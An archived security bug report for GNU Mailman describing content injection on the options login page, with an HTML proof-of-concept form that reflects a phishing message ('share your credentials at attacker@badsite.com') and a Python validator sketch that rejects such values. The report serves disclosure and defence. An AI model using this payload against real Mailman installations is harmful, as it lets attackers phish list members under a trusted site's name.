[Bug 1873722] [NEW] Arbitrary Content Injection via the options login page.
Mark Sapiro
mark at msapiro.net
Sun Apr 19 23:05:39 EDT 2020
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE-2018-13796 (https://www.cvedetails.com/cve/CVE-2018-13796/)
exists at a different endpoint and parameter. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. The message "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker@badsite.com"
will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1873722
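Added example, not part of the original report and not Mailman's own code: a sketch of a server-side check for the injection described above, where the submitted "email" value is reflected only if it is a single plausible address. The function names, the notice strings and the address pattern are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Conservative addr-spec check (assumption: deliberately stricter than RFC 5322).
_ADDR_RE = re.compile(
    r"[A-Za-z0-9.!#$%&'*+/=?^_`{|}~-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
MAX_ADDR_LEN = 254


def is_plausible_address(value):
    """True only for one short addr-spec with no whitespace or prose."""
    return len(value) <= MAX_ADDR_LEN and _ADDR_RE.fullmatch(value) is not None


def render_login_notice(post_body):
    """Build the notice for a hypothetical options login page.

    post_body is the raw application/x-www-form-urlencoded request body.
    """
    fields = parse_qs(post_body, keep_blank_values=True)
    email = fields.get("email", [""])[0].strip()
    if not is_plausible_address(email):
        # Do not echo the submitted value. HTML escaping alone would still
        # display attacker-chosen plain text on the trusted origin.
        return "<p>Illegal email address.</p>"
    return "<p>Enter the password for %s.</p>" % html.escape(email, quote=True)


# Constructed sample bodies: the report's form fields, and a normal address.
INJECTED = (
    "email=Your+account+has+been+hacked.+Kindly+go+to+https%3A%2F%2Fbadsite.com"
    "+or+share+your+credentials+at+attacker%40badsite.com"
    "&UserOptions=Unsubscribe+or+edit+options&language=en")
NORMAL = "email=user%40example.org&language=en"

if __name__ == "__main__":
    print(render_login_notice(INJECTED))
    print(render_login_notice(NORMAL))
```

The report's payload contains no markup, so output escaping does not change what the visitor sees; the check has to reject the value before it is reflected.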